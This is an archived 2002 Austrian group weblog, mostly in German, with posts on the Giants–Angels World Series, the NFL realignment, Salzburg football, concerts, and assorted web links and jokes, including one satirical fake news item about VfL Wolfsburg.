    der ausgleich is schon mal geschafft, feiner krimi!!!!
    dass dieses spiel 4 extrem wichtig war, ist wohl jedem klar; entweder die angels haben 3 matchbälle in folge oder die ganze serie ist wieder ausggeglichen. das merkte man von beginn an!
    zwar gingen die in diversen san franciscoer tageszeitungen schon HELLS ANGELS genannten südkalifornier schon bald 3:0 in führung und alles schien dort weiterzugehen, wo es am vortag geendet hatte, doch irgendwie kam diesmal dann doch alles anders.
    das pitching der giants wurde besser und besser, und die angriffsmaschinerie aus anaheim wurde endlich gestoppt. wie am vortag konnten die giants im fünften inning drei läufer nach hause bringen und somit zum 3:3 ausgleichen. in den nachfolgenden innings liessen beide teams immer wieder runner in aussichtsreicher position stranden bis dann im 8. inning das ende der angels seinen lauf nahm.
    zuerst ein kurz-hit von kirk rueter, der mitten zwischen pitcher und catcher zum liegen kam, und obwohl wahrscheinlich beide rechtzeitig am ball waren, konnte rueter wegen der uneinigkeit der beiden knapp auf die erste base kommen. direkt im anschluss ein bunt (abtropfen-lassen des balles) von kenny lofton (siehe bild rechts), der die foulline entlangrollte und einfach nicht hinausrollen wollte. und direkt danach liess david bell einen base-hit single (siehe bild rechts) heraus, der den entscheidenden run nach hause brachte. scheeee!!!

    spiel 5 (heute nacht) sollten die giants bitte mit der gleichen konsequenz und leidenschaft führen wie das gestrige. eine 3:2-führung wär für die letzten ein, zwei spiele, die ja wieder in anaheim stattfinden werden extrem wichtig. ich geb ganz offen zu, dass ich nach wie vor von der starken leistung der angels in spiel 3 sehr beeindruckt bin, und genau deshalb trau ich den giants auch keine zwei auswärtssiege in folge (die ja beim stande von 2:3 nötig wären) zu, sorry.
    das spiel heute nacht hat also eindeutig vorentscheidende - wenn nicht sogar entscheidende - bedeutung.
    ich sags jetzt einfach mal so: wer spiel 5 gewinnt, gewinnt auch den titel!
    GO GIANTS!!!!!!!!!!

    aja, übrigens:
    die ganze saison über gab es auf mlb.com eine internet-abstimmung über die "Top 10 Most Memorable Moments in Major League Baseball History".
    das endergebnis wurde gestern nacht vor dem spiel von andy garcia, ray liotta und billy crystal präsentiert.

    GAME FIVE:
    WOW!!!! WHAT A GAME!!!!!
    eine demonstration sondergleichen!!!
    extrem geschlossene mannschaftsleistung der giants; maximal noch hervorzuheben: jeff kent (siehe bild rechts), der nun der erste giants-spieler seit 1917 ist, der 2 homeruns in einem world series game schlägt.
    aber heut waren wirklich alle grandios!!!!
    diese 16 punkte sind das zweithöchste scoring, das es je in einem world series game gab. 1936 schafften die yankees 18...
    der einzige giant, der letzte nacht wirklich in gefahr war, war der sohn von dusty baker (chefcoach). der 3-jährige darren (siehe bild rechts), seineszeichens batboy, hat nun eine bilanz von 8:0 (die giants haben alle acht spiele, bei denen er dabei war, gewonnen!). im 7. inning schlug kenny lofton einen 2-run-triple, das heisst er selbst kommt bis zur 3. base und durch ihn kamen zwei spieler nach hause. die aufgabe des batboys ist es immer den schläger des batters einzusammeln. der kleine darren hat wohl mit einem homerun gerechnet und wollte seiner arbeit nachgehen, der ball fiel aber von der begrenzungsmauer wieder zurück ins spielfeld und auf einmal rannten zwei spieler vollgas richtung homeplate auf ihn zu. j.t. snow konnte ihn im vorbeilaufen am krawattl packen und mit sich schleppen und ihn so vor dem heranstürmenden mannschaftskollegen (david bell) und dem ball beschützen. die ganze gallerie dieser aktion gibts hier. die ganze story inklusive interviews und des besorgten anrufs seiner oma gibts hier ;-).
    durch den gestrigen kantersieg der giants schauts jetzt wieder viel besser als noch vor zwei tagen aus. ein einziger sieg fehlt noch zum titel!!!
    da ich ja eigentlich eh schon alle spieler der giants mindestens einmal erwähnt habe, hier nun mal die exakte mannschaftsaufstellung:
    catcher: benito santiago
    1st base: j.t. snow
    2nd base: jeff kent
    3rd base: david bell
    short stop: rich aurilia
    left field: barry bonds
    center field: kenny lofton
    right field: reggie sanders

    hier noch kurz ein paar zitate aus der jüngsten vergangenheit;
    vorhersagen vor den world series:
    stephen canellas vorhersage: angels in seven games
    john donovans vorhersage: angels in six
    meine vorhersage: giants in six
    meine vorhersage nach spiel zwei:
    ich lehn mich jetzt mal etwas weit aus dem fenster und prognostiziere folgendes:
    zwei dieser drei heimspiele gewinnen die giants, damit gehts am freitag beim stand von 3:2 für die giants zurück nach anaheim. und eines dieser zwei spiele gewinnen die giants dann noch.
    schaut doch ganz gut aus für mich :-)))
    j. donovan is jedenfalls schon out!!!

    heute ist wieder reisetag, in der nacht von samstag auf sonntag folgt dann spiel 6; einen tag später wenn nötig spiel 7...

    GAME SIX:
    so, zuerst einmal muss ich eingestehen, dass ich wegen einer geburtstagsfeier (congratz romario!!!) die ersten 7 innings versäumt habe. ich hab zwar im internet das box score ständig mitverfolgt, und es sah auch immer ganz gut aus, lang 0:0, dann 3:0, 4:0, 5:0 und auf einmal (im 7. inning) 5:3, die letzten 3 runs der angels hab ich dann noch live mitverfolgen müssen.
    noch nie zuvor hat ein team in einem game, das das ende der saison bedeuten kann, einen 5-punkte-rückstand aufgeholt, diesmal aber schon...
    naja, bei diesen world series wundert mich irgendwie eh nix mehr...
    hab mir jetzt gerade die endphase der aufzeichnung nochmal angeschaut, mehr als kopfschütteln fällt mir dazu allerdings nicht ein...
    scott spezio (siehe bild rechts) von den angels hat mit seinem 3-run-homerun im 7. inning wieder leben in die fast schon besiegt geglaubten angels gehaucht und die aufholjagd gestartet. darin erstad stellt mit einem homerun auf 5:4 und troy glaus (siehe bild rechts) bringt mit einem two-run double die entscheidung für die angels...
    tststsss, nach dem beeindruckenden spiel 5 der giants war damit ja wohl wirklich nicht zu rechnen!!!!

    somit kommt es heute nacht zum allesentscheidenden

    GAME SEVEN:
    hmmm, naja, nach dem gestrigen spiel war das heute leider zu befürchten...
    zwar gingen die giants im 2. inning mit 1:0 in führung doch schon im direkten gegenzug folgte der ausgleich. die endgültige entscheidung gab es schon im 3. inning als garret anderson (siehe bild rechts) bei geladenen bases an den schlag kam; mit seinem 3-run double stellte er schon sehr früh auf den späteren endstand von 4:1.
    die giants kamen zwar immer wieder auf base konnten aber keinen einzigen run mehr nach hause bringen. neben dem nötigen biss fehlte ihnen wohl heute vor allem der glaube an sich selbst und daran das spiel noch einmal drehen zu können...
    chefcoach mike scioscia (siehe bild rechts mit der trophäe) und sein team haben den sieg letztendlich verdient, vor allem weil sie mit ausnahme von spiel 5 in keinem spiel aufgesteckt haben und immer wieder alles probiert haben ein fast schon verloren geglaubtes spiel noch umzudrehen. die eigentliche entscheidung dieser serie fiel wohl schon in spiel 6 als die giants sich schon bei der champagner-dusche wähnten und die angels mit einem grandiosen comeback das spiel noch drehen konnten...
    congratz to the angels!!!
    in der 41-jährigen geschichte der angels ist das ihr erster world series title!!!

    hier nun noch ein paar kommentare diverser protagonisten nach dem spiel:
    giants chefcoach dusty baker: "The turning point was basically they came back last night."
    barry bonds: "I went 1-for-3 with a walk, thats a good day. Am I supposed to go 3-for-3 with three home runs? What do you want from me? You want the results to be different. They outplayed us, they deserve it. They beat us. They are world champions."
    garret anderson: "Well, I just wanted to get into a situation where I would be able to hit my pitch, not do too much." troy percival (angels closer): "Unbelievable for us, for our fans. This team has worked as hard as any team ever. We deserve it."

    zum verdienten mvp der world series wurde troy glaus (siehe bilder rechts, bei der champagnerdusche und mit der trophäe) gewählt, der mit 3 homeruns und 8 rbis grossen anteil am sieg der angels hatte!!!

    abschliessend möcht ich mich noch bei beiden teams für ihre fantastischen auftritte in den playoffs und für die äusserst spannenden world series bedanken!!!
    see you all in april!!!
    :: schnaeppchen  sTe  10.04.2002 11:31:14
    ein schnaeppchen aus dem jahre 1987

    LegoTech on Tour :)


    from october 14th until 19th, world chess champion, Vladimir Kramnik, will represent mankind in a struggle to cope with Deep Fritz, one of the worlds most powerful chess AIs. the eight game match will be played in Manama, Kingdom of Bahrain. even those who dont understand chess may find this match interesting.
    :: ähnlichkeiten im internationalen fussball ;-)))  bully  10.03.2002 23:27:03

    :: ever heard of telnet?  sTe  10.03.2002 11:39:21
    so check this out so your telnet.exe gets accessed at least once in its life:
    telnet://blinkenlights.nl/

    holpriger wahlkampfauftakt

    :: gotv  sTe  10.02.2002 21:46:58
    fast unbemerkt hat sich da ein neuer sender ins wiener kabelnetz geschlichen: gotv auf frequenz 273.500 MHz, haupsaechlich musik, zielgruppe junges publikum, teletextseite für jeden seher und mitgestaltung des musikprogramms via sms...
    soviel zu den fakten. dahinter steht mit thomas madersbacher kein unbekannter, seineszeichens chef vom mitlerweile eingestellten sender tiv; gesendet wird uebrigens aus dem 5. hieb
    hermann hermann  babsi  10.02.2002 20:19:17
    tu uns das nicht an :( - wie es aussieht nimmt sich österreichs aushängeschild/sportidol/jugendvorbild/alltimehero eine auszeit - ganz ohne sport und training. nicht dass ich mir nicht vorstellen könnte, dass irgendwann sogar ihm die kraft nach immer neuen rückschlägen ausgeht, aber eine erfolgreiche rückkehr in den skizirkus, wäre sooo schön gewesen. lasset uns hoffen!
    :: 1971 - 2002  bully  10.02.2002 12:07:34

    gleichalt wie die meisten von uns setzt sich das lehener stadion nun sehr sehr bald zur ruhe.
    wieviele wunderschöne stunden haben wir ach hier verbracht!!!
    deshalb bin ich der meinung, dass wir diesen altehrwürdigen mauern noch einen letzten kollektiven besuch abstatten sollten.
    unsere allerletzten chancen in diesem stadion der salzburger austria zuzujubeln sind:

    Sa., 26.10., 15.30 Uhr: Austria Salzburg - GAK
    Sa., 09.11., 15.30 Uhr: Austria Salzburg - Rapid
    Sa., 23.11., 15.30 Uhr: Austria Salzburg - Ried

    ganz besonders würd sich wohl der mittlere termin anbieten. erstens wegen des gegners und zweitens sind an den anderen tagen wohl jeweils geburtstagsfeierlichkeiten zu erwarten... ;-)
    na, wie wärs???
    :: illusion part 2  sTe  30.09.2002 09:45:14
    teilweise simple aber doch verblueffend, sehr schoen aufbereitet: Lightness Demonstrations
    :: fernsehtip  sTe  28.09.2002 13:39:54
    heute 00.15 auf SAT1: Königspilsener Musicspecial: Paul Weller live in Potsdam. sollte man sich nicht entgehen lassen...
    :: misc  sTe  26.09.2002 13:08:38
    Amazing example of very bad driving;
    A nice optical illusion
    :: time?  sTe  25.09.2002 09:36:32
    some say time is the fire in which we burn. i am not sure how to define time. maybe that´s why some people decided to describe it with pictures.
    :: HAPPY RUPERTI DAY, all you Soizbuaga!!!!!  bully  24.09.2002 06:04:14

    Rupert (rechts, mit Salzfass) stammte aus einer fränkischen Adelsfamilie und war Bischof von Worms.
    Herzog Theodo von Regensburg berief ihn um 690 nach Bayern; dieser unterstützte dann Rupert bei seiner Missionsarbeit bzw. bei der Revitalisierung früherer Missionsversuche nachdrücklich; er schenkte Rupert die Salzquelle in (Bad) Reichenhall und die Stadt Salzburg.
    Rupert taufte Theodo und veranlasste ihn zu einer gemeinsamen Donauschifffahrt, um an den Ufern entlang bis nach Ungarn das Christentum zu verbreiten. Dabei unterstützt wurde er von Chunialdus und Gislarius.
    Nach längerer Wirksamkeit in und um Regensburg ging Rupert nach Salzburg; die Stadt war durch die Völkerwanderung weithin eine verwüstete und verwaiste Ruinenstadt. Er bewirkte ihren Wiederaufbau, förderte den Salzbergbau, wurde Abt im von ihm 696 gegründeten Kloster St. Peter und auch erster Bischof Salzburgs. Des weiteren gründete er das Frauenkloster St. Erentrud auf dem Nonnberg. Rupert starb 718 in Salzburg; er wurde im neuerbauten Dom der Stadt beigesetzt.
    Seine Reliquien ruhen noch heute im Dom und in St. Peter, der 24. September ist der Tag der Überführung seiner Gebeine.
    :: was haben wir euch getaaan??? :-((((((   bully  23.09.2002 22:20:13

    Die Red Hot Chili Peppers gehen auf grosse Europa-Tour:
    Lisboa Atlantic Pavillion (January 24)
    Madrid Palacio Vistalegre (27)
    Milano Filaforum (30)
    Rome Palaeur (February 2)
    Bologna Palamalaguti (5)
    Dortmund Westfalenhalle (7)
    Dresden Messehalle (9)
    Berlin Velodrome (10)
    Paris Bercy (12)
    Stuttgart Schleyerhalle (16)
    Glasgow SECC (March 5)
    London Docklands Arena (8-9)
    Manchester Evening News Arena (11)
    Antwerp Sportpaleis (14)
    Zurich Hallenstadion (16)
    München Olympiahalle (17)
    Rotterdam Ahoy (19-20)
    Hamburg Colour Line Arena (22)
    Helsinki Hartwal Arena (24)
    Turku Turku Hall (25)
    Oslo Spectrum (27)
    Stockholm Globe (29)

    Fast überall spielen sie, nur nach Österreich kommen sie nicht!!!!!!!
    :-(((((((((
    closest to us: Munich on St. Patricks Day
    Tickets gibts ab Samstag...
    cup stacking   sTe  23.09.2002 17:55:04
    trust your eyes? see emily fox in action, watch her cup stacking.
    oarg... (via p3k.org)
    :: californian races...  bully  20.09.2002 20:11:42

    in der major league baseball kommt es knapp vor ende der regular season zu zwei spannenden zweikämpfen jeweils zwischen zwei kalifornischen teams:
    in der american league geht es zwischen den OAKLAND ATHLETICS (As) (96 siege, 57 niederlagen; schnitt: .627) und den ANAHEIM ANGELS (95 siege, 58 niederlagen; schnitt: .621) um den titel in der western division.
    noch spannender scheint es in der national league zu werden, geht es doch hier um den letzten freien playoff-platz (wildcard-team). um diesen platz kämpfen die SAN FRANCISCO GIANTS (87 siege, 66 niederlagen; schnitt: .569) und die L.A. DODGERS (86 siege, 67 niederlagen; schnitt: .562).
    eine heisse endphase scheint also ins haus zu stehen... sehr schön!!!
    :: WAHL-O-MAT  bully  19.09.2002 00:40:29

    DER WAHL-O-MAT
    ganz witzig!!!
    die persönliche wahlhilfe; empfehle ich besonders bayerischen traditionswählern ;-)
    mein ergebnis (rechts) hat mich schon etwas überrascht, muss ich sagen...
    hehehe...  sTe  18.09.2002 13:45:26
    Bill Gates released Daughter 2.0 codename Adelle   sTe  18.09.2002 13:35:35
    Today Bill Gates and his wife released their Daughter 2.0: Phoebe Adelle Gates" previously known as codename "Adelle".

    Phoebe Adelle Gates -- arrived at 12:36 a.m. at Overlake Hospital Medical Center in Bellevue. She weighed 9 pounds, 13 ounces.
    oh wie ist das schön  utility  18.09.2002 11:10:40

    sowas hat man lange nicht gesehen...

    Dienstag 18.9.2002 18:00: anpfiff auf Happel!

    Das ungemütliche oval wirkte beängstigend leer, da nicht mehr als 13.000 den weg hierher gefunden hatten. Trotzdem, die vielleicht 5.000 herren von der west machten 90 minuten nonstop eine bomben stimmung, erst recht nach dem deprimierenden 0:1 rückstand.

    Das solls schon wieder gewesen sein, dachte ich mir da? aber schon kurz nach dem rückschlag kamen die Veilchen immer besser ins spiel. mit kämpferherz und jede menge spielwitz wurden die Ukrainer immer mehr unter druck gesetzt. dann das doppelpack vom Ocki, der überhebliche elfer vom djalminha (da is einem wirklich das herz kurz stehengeblieben) und zur pause sah schon alles viel violetter aus.

    In der zweiten hälfte spielte dann auch nur mehr die Austria, vergab aber sitzer um sitzer ganz nach alter tradition. da hatten sogar die Ukrainer bei ihren einzigen zwei gegenstössen in HZ #2 beinahe noch was angerichtet.

    Aber in den letzten minuten kams dann: "Hey,Hey Wicki...", doppelpack von Torstein Helstad zum mehr als verdienten 5:1 endstand.

    Alles in allem, ein sehr gelungenes comeback der Veilchen nach so vielen jahren der EURO-abstinenz mit einer weltklasse leistung vom Janocko und den fans der west. ich freu mich schon auf die 2. runde, dann werden sich wohl auch mehr leute in den Prater verirren.
    :: signs  sTe  16.09.2002 22:54:02
    soeben ´signs´ angeschaut; fazit: durchwegs spannend, bisweilen sogar gaensehautstimmung die einen beinahe fast in panik geraten laesst, dazwischen immer wieder skuriler humor;
    ueber das ende des films werde ich jetzt nichts verraten, soll jeder selbst entscheiden;
    alles in allem ein aeusserts gelungener film von M. Night Shyamalan (´unbreakable´, ´sixth Sense´), mit einem durchaus glaubhaften Mel. Gibson;
    :: RIP, JOHNNY UNITAS, #19
    (05.07.1933 - 12.09.2002)
      bully  15.09.2002 23:16:42
    Am Donnerstag, dem 12. September 2002, verstarb einer der genialsten Football-Spieler aller Zeiten im Alter von 69 Jahren:
    JOHNNY UNITAS
    Der langjährige Quaterback der Baltimore Colts ging vor allem durch seine Spielintelligenz, seinen starken Wurfarm und seine Nerven in die Geschichte der NFL ein.
    Ein (wahrscheinlich nie mehr überbietbarer) Rekord: Zwischen 1956 und 1960 warf er in 47 aufeinander-folgenden Spielen jeweils mindestens einen Touchdown-Pass.
    Weiters kam er in seiner Karriere auf unglaubliche 26 Spiele mit mindestens 300 passing Yards, insgesamt warf er in seiner Karriere 2830 complete passes für 40.239 Yards und 290 Touchdowns (Joe Montana: 273).
    Auch wird er als der Erfinder des Two-Minute-Drills gehandelt; das No-Huddle war eine seiner Spezialitäten.
    Rest in Peace, Johnny!!!
    :: montgomery --> 100m-weltrekord !!!  sTe  14.09.2002 20:42:06
    was für ein GP-finale! tim montgomery laeuft in paris in 9,78 sek zu einem neuen weltrekord ueber die 100 meter. eine hunderstel ueber dem alten rekord von maurice greene vom 16. juni 1999
    (video here)
    :: bruce europe dates  sTe  14.09.2002 11:42:11



    :( maybe next year, a little bit closer...
    :: zur zerstreuung...  bully  09.11.2002 11:44:11
    wo sollte der ball sein?
    :: monday stuff  sTe  09.09.2002 10:23:34
    Quake3 in Shockwave. damn impressive, really.

    another "100 greatest website" listing
    :: SKANDAL  sTe  09.09.2002 10:11:21
    da hat man an die 40 sender, und keiner brachte das US OPEN finale!
    weit ists gekommen mit dem privatfernsehen !!!
    :: a change for the better  sTe  09.08.2002 21:51:46
    unendlich erhofft, lange erwartet, endlich passiert!
    meine herzliche gratulation geht an alle FPÖ jünger -
    sowie an den machtgeilen, mundfaulen schuessler!
    DANKE!
    danke fuer die grandiose arbeit! danke fuer das aeusserst
    demolierte ansehen, welches wir im ausland geniessen!

    dank geht auch an printorgane wie ´presse´ und ´krone´fuer die
    phantastischen, konstruktiven meinungssuggestionen!

    eins gilt fuer alle genannten: ´FUCK OFF!!!´

    dafuer brauchte man kein prophet und schon gar kein feelosophee
    zu sein um das zu erahnt zu haben...
    :: AUT : MOL  sTe  09.07.2002 20:16:54
    :: cannes lions  sTe  09.07.2002 13:12:34

    Cannes Lions 2002 gibts hier zum anschauen,..
    sind wieder ein paar sehr nette clips dabei...
    :: new sports section  sTe  09.07.2002 11:55:20
    brandneu!!! die feel-o-sport section;
    viel spass und nettes diskutieren wuensche ich...
    :: NEW NFL SEASON TO START ::  bully  09.03.2002 09:30:52
    Gestern erfolgte der Kick-Off zur neuen NFL-Saison.
    Zum ersten Mal gibt es heuer sowohl in der AFC alsauch in der NFC je 16 Teams und dadurch auch erstmals vier Divisions pro Conference. Neu dabei: Die Houston Texans
    Hier die Neueinteilung der NFL:

    NFC NORTH:
    Chicago Bears
    Green Bay Packers
    Minnesota Vikings
    Detroit Lions

    NFC SOUTH:
    Tampa Bay Buccaneers
    New Orleans Saints
    Atlanta Falcons
    Carolina Panthers

    NFC EAST:
    Philadelphia Eagles
    Washington Redskins
    New York Giants
    Dallas Cowboys

    NFC WEST:
    St. Louis Rams
    San Francisco 49ers
    Seattle Seahawks
    Arizona Cardinals

    AFC NORTH:
    Pittsburgh Steelers
    Baltimore Ravens
    Cleveland Browns
    Cincinnati Bengals

    AFC SOUTH:
    Tennessee Titans
    Indianapolis Colts
    Jacksonville Jaguars
    Houston Texans

    AFC EAST:
    New England Patriots
    Miami Dolphins
    New York Jets
    Buffalo Bills

    AFC WEST:
    Oakland Raiders
    Denver Broncos
    Kansas City Chiefs
    San Diego Chargers

    Die Superbowl XXXVIII findet diese Saison am 26. Jänner im Qualcomm Stadium, San Diego statt.
    Top-Favoriten sind heuer laut OBG die Rams vor den Steelers und den Eagles. Dem muss ich mich grundsätzlich anschliessen, würde aber gleichzeitig auch vorschlagen die Bears und die Raiders nicht zu vergessen. Der Titelverteidiger (Patriots) liegt quotenmässig überraschenderweise nur auf Rang 9.
    Die ersten schon feststehenden Live-Spiele auf Premiere:
    08.09. 22:10 Uhr: St. Louis @ Denver
    10.09. 03:00 Uhr: Pittsburgh @ New England
    :: cool tool  sTe  09.02.2002 14:21:53


    3. preis beim diesjährigen "Marksman Design Award" - loeffel mit eingebauter waage; grandios !!!
    schweinecool auch dieses teil
    ein spielchen gefällig?  babsi  09.02.2002 13:11:34
    ist nichts für schwache nerven :)
    :: streaming  sTe  29.08.2002 12:48:42
    Listening to/watching: Queens of the Stone Age - No One Knows
    phantastic quality !!!
    :: growing  sTe  24.08.2002 17:39:57


    wer weiss was das fuer pilze sind die da aus unserem yuka-topf spriessen ?!?!?!?
    :: tba  sTe  23.08.2002 10:01:06
    hier sollte eigentlich ein artikel vom bully stehen, in anbetracht dass es nach dem we
    eine eigene sportsection geben wird, ist dieser bereits dorthinein gewandert...

    "Diese Menschen gleichen Löwen, die von Affen zur Schlachtbank geführt werden." Ein Interview mit John Cleese. (via henso)
    :: playing cards  sTe  21.08.2002 02:12:50
    ...wir habens doch noch geschaft: der laengst geplante monatliche kartenabend feierte seinen einstand; [...pics...]
    das sparschwein freut sich ueber hauptsaechlich meine, aber nicht nur meine wohlbemerkt, eingezahlten euro cent...
    ohnehin wars mehr als nett und fortsetzung folgt sowieso...;
    :: Skandal: Wolfsburg kauft Bayern leer!  bully  17.08.2002 00:39:30

    Die schlimmsten Befürchtungen von Uli Hoeness scheinen wahr zu werden. Der schlafende Riese im Norden ist erwacht.
    Die Rede ist vom VfL Wolfsburg, welcher gesponsert vom Weltkonzern VW seine Rolle in der höchsten deutschen Fussballklasse korregieren will. Die Bombe platzte vor wenigen Minuten auf einer Pressekonferenz.
    "Unser Mauerblümchendasein wird bald der Vergangenheit angehören!" verspricht VfL Manager Pander.
    Die Verhandlungen mit Sforza, der leider Richtung Kaiserslautern abwanderte und Effenberg seien nur der Anfang gewesen.
    VW-Chef Pischetsrieder ergänzt in wild entschlossenem Ton:
    "Ab heute wird geklotzt und nicht mehr gekleckert!"
    Die Umsatzzahlen und Gewinnspannen, die im Profifussball von Spitzenklubs wie den Bayern seit Jahren erzielt werden, haben wohl den Ausschlag gegeben.
    "Wir werden die Marke VW im Weltmarkt völlig neu platzieren" meint Pischetsrieder "dabei wird der VfL unser Trumpf-As werden!" ergänzt er.
    Ziel sei der mittelfristige Aufbau eines VW-Dreamteams, das neben Meisterschaft und CL-Sieg auch die Basis für den Gewinn der WM 2006 bilden soll.
    Laut Pander lässt sich dieses Ziel mit relativ geringem logistischen Aufwand sehr zügig realisieren.
    "Bayern wird für uns die Rolle spielen, die jüngst Ajax für Barcelona spielte. Ich darf ihnen mitteilen, dass wir bereits mit 8 Spielern aus München verhandeln!".
    Auf die wirtschaftliche Potenz der Bayern und die daraus zu erwartenden Schwierigkeiten angesprochen verweist Pischetsrieder feixend auf die VW-Wirtschaftsdaten der letzten Jahre.
    "Portokasse!" meint er grinsend.
    Doch die Pläne der Wölfe gehen noch weiter. So soll in Wolfsburg ein neues Stadion für 80.000 Zuschauer entstehen, um dem zu erwartenden Fanboom auch gerecht werden zu können.
    Auf den Vorwurf der Wettbewerbsverzerrung reagiert Pander barsch: "Die Art und Weise wie wir unser ehrlich verdientes Geld anlegen lassen wir uns von niemandem diktieren. Schliesslich werden wir den Bayern eine dreistellige Millionensumme überweisen. Genug Geld um sich auf Jahre hinaus direkt hinter dem VFL platzieren zu können. Das muss eben reichen."
    ;-)
    DAVE WILLIAMS found dead  romario11  16.08.2002 09:09:40
    DAVE WILLIAMS, the lead singer of US rock outfit DROWNING POOL, was found dead on the band´s tour bus yesterday (August 14). He was 30 years old.

    A cause of death has not yet been determined.

    Drowning Pool had been on tour with Ozzfest when tragedy struck. The rolling hard rock revue had been in Noblesville, Indiana on Tuesday (August 13) and bands were enjoying a day off before resuming in Bristow, Virginia tonight. The Ozzfest show will go ahead as scheduled, sonicnet reports.

    Drowning Pool rose to fame on the back of success on last year´s Ozzfest. They began the tour opening on the third stage and finished it with slot on the second. They were a Main Stage band this year.

    Disturbed frontman David Draiman, a friend of the band, was one of the first people to pay tribute to Williams.

    "He was the sweetest man you´ll ever come across in your life," he said. "[He] didn´t have a bad bone in his body, just very kind-hearted, very good-natured, very genuine, always trying to make everyone around him smile. [He was] always trying to bring some life to the party with his own little dramatic flair.

    "Everyone loved him. I don´t know a single person that has ever met Dave Williams and not just instantly fallen in love with him. He could charm anyone to death. He was a very special guy. It´s shocking."

    Tut mir sehr leid um die Truppe, die gerade mit ihrer neuen Single "Tear Away" auf dem Weg in die Oberliga waren...

    :: back again  sTe  08.10.2002 19:32:47
    4 entspannte tage im lungau verbracht; das wetter war zwar bescheiden, aber bei langem nicht so uebel wie manch anderen ortes (our pics here);
    erwaehnenswert ist freilich die heuer unglaubliche menge an pilzen (war fast schon faad) und kuehen, die doch eher lautstark ihren trieben nachgingen :)
    und wieder daheim, die optimale raumausnutzung gefunden...



    :: DEAR REINHART GAUGG  bully  08.04.2002 21:48:10

    THIS FILE is just for you!!!
    ;-)))
    ... und tschüss!!!
      sTe  08.04.2002 16:07:39
    :: BRAVO MIRNA !!!!  bully  08.03.2002 17:48:01

    200m Brust, beeindruckender Start-Ziel-Sieg,
    1,54sek Vorsprung, 16 Jahre alt, 2:25,83
    GOLD IN BERLIN!!!
    MIRNA JUKIC!!!!
    GRATULIERE GAAAANZ HERZLICH!!!!
    (der seeger bertl war sehr nah am herzinfarkt ;-)) )
    :: next project online  sTe  08.02.2002 16:09:31

    its friday, 16:01 and we just launched Congress Casino Baden (codename CCB)
    :: I am 47% Geek  sTe  08.02.2002 14:19:30



    You probably work in computers, or a history deptartment at a college. You never really fit in with the "normal" crowd. But you have friends, and this is a good thing.

    Take the Geek Test at fuali.com
    :: welcome august  sTe  08.01.2002 14:35:43

    introducing: The Ultimate Computer Chair

    und der mist des tages ist dieses game
    :: Riad in Panik, Isnogud unterwegs??? ;-))  bully  30.07.2002 21:28:13
    SAUDI-ARABIEN:
    Gestern vor einer Woche war Prinz Achmed ben Salman ben Abdel Asis im Alter von 43 Jahren einem Herzinfarkt erlegen.
    Auf dem Weg zu dessen Beerdigung starb heute vor einer Woche sein Cousin, der 41-jährige Prinz Sultan ben Faisal ben Turki el Saud bei einem Autounfall.
    Gestern verdurstete der 25-Jährige saudiarabische Prinz Fahd ben Turki ben Saud el Kabir auf einer Reise durch die Provinz Rimah mitten in der Wüste.

    Was is da los, was wird da gschpüd???
    3 tote Prinzen in einer Woche...
    Sowas kann ja wohl kein Zufall mehr sein...
    Bin gespannt, ob bezüglich der Thronfolge noch ein paar interessante Fakten in den nächsten Tagen auf uns zukommen... ;-)
    :: lemmings  sTe  30.07.2002 09:04:05
    yesss! the original lemmings game online!
    :: goin´ for a walk  sTe  28.07.2002 12:23:25



    traumhaftes wetter auf der schmelz...
    :: r.i.p  sTe  28.07.2002 09:56:58
    feelosophee´s boxen haben ausgedient; nach 13 jahren treuesten dienstes in form von haupsaechlich gitarrenlastiger beschallung;
    das gebrechen ist auf dem bild rechts zu sehen; der kunststoff ist zu sproede und broeckelt auseinander wenn man nur hinsieht;
    trotzdem danke infinity, wir hatten viel spass...
    :: schlechte aussichten  sTe  24.07.2002 14:02:43
    Noch vor einem Jahr konnte der Markt nicht genug davon abwerfen, heute will sie keiner mehr. Die Rede ist von den IT-Spezialisten, die sich in den vergangenen Jahren auf das Thema Internet spezialisiert haben. Nach Angaben der Computerwoche sind die Jobangbote in Deutschland im ersten Halbjahr 2002 um ganz 70 Prozent im Vergleich zum Vorjahreszeitraum zurückgegangen. Wurden 2001 noch über 50.000 Online-Fachleute gesucht, waren es heuer nur noch armselige 15.000. Besonders schlechte Aussichten haben Programmierer von Internet-Seiten, E-Commerce- Spezialisten und Online-Redakteure, hier haben sich die Angebote gar um 86 Prozent reduziert.
    (c) horizont

    gottseidank mach ich ja gaaaanz was anderes :(
    :: happy birthday, mh!!!  bully  23.07.2002 00:28:42

    happy 30th birthday, klane. let it rock tonight!!!
    :: klipping  sTe  22.07.2002 19:40:28
    feelosophee´s news can be accessed directly by klipfolio now! download this nifty application; and then follow this link
    there also many other interesting news providers accessable through this app...



    :: rising  sTe  21.07.2002 12:04:59
    endlich ist sie da, die neue bruce!!! erstmals wieder mit der
    e-street band seit 1984!!!
    gefaellt ausserordentlich muss ich sagen; besonders "wating on a sunny day" und das anfangs ungewohnte "worlds apart";
    und auch der zu befuerchtende 11.september mist haelt sich in grenzen...official release date: 30.7.

    und zu der anstehenden tour:
    start ist der 7.august; in europa wirds heuer definitiv nur 7 shows geben (zw 14 und 27 oktober), aber um welche staedte es sich handelt ist noch nicht bekannt. 2003 gehts dann weiter mit gigs in europa,..mal schaun wann/ob er kommt...
    :: clock  sTe  19.07.2002 10:27:34
    this binary clock is cool but there´s no way on earth you´d be able to work out the time first thing in the morning, with a hangover.

    take the wienerisch test;
    super ist die "Asphalt-Tuttl" :)
    staerker wia die stier :-)  babsi  18.07.2002 22:52:56
    gelungener weltrekord versuch des salzburger fliesenlegers f. muellner: der junge mann (33) hat den 70tonnen schweren airbus 18m weit gezogen - mit reiner muskelkraft!
    hut ab!
    :: mixed up  sTe  17.07.2002 16:03:07
    aus unserer beliebten reihe verrueckter pc-umbauten:
    The Caffeine Machine
    outlook 11 wird so auschauen;
    interessantes project ist der StreetWriter (video anschauen);
    und zuletzt ein photo aus Pamplona

    :: update  sTe  17.07.2002 10:18:13
    new feature added: ´latest referrers´ below ´latest links´ on the right side...
    some interesting search results lead to us ...
    :: photomania  sTe  15.07.2002 23:44:05

    new photos of clemens superb grill party and of our daughter...
    :: armstrong - spekuliert oder geschwächelt???  bully  15.07.2002 18:50:38
    seit 1998 passierte es heute zum ersten mal, dass der us-amerikaner lance armstrong (30) (rechts) ein einzel-zeitfahren bei der tour de france NICHT gewinnt.
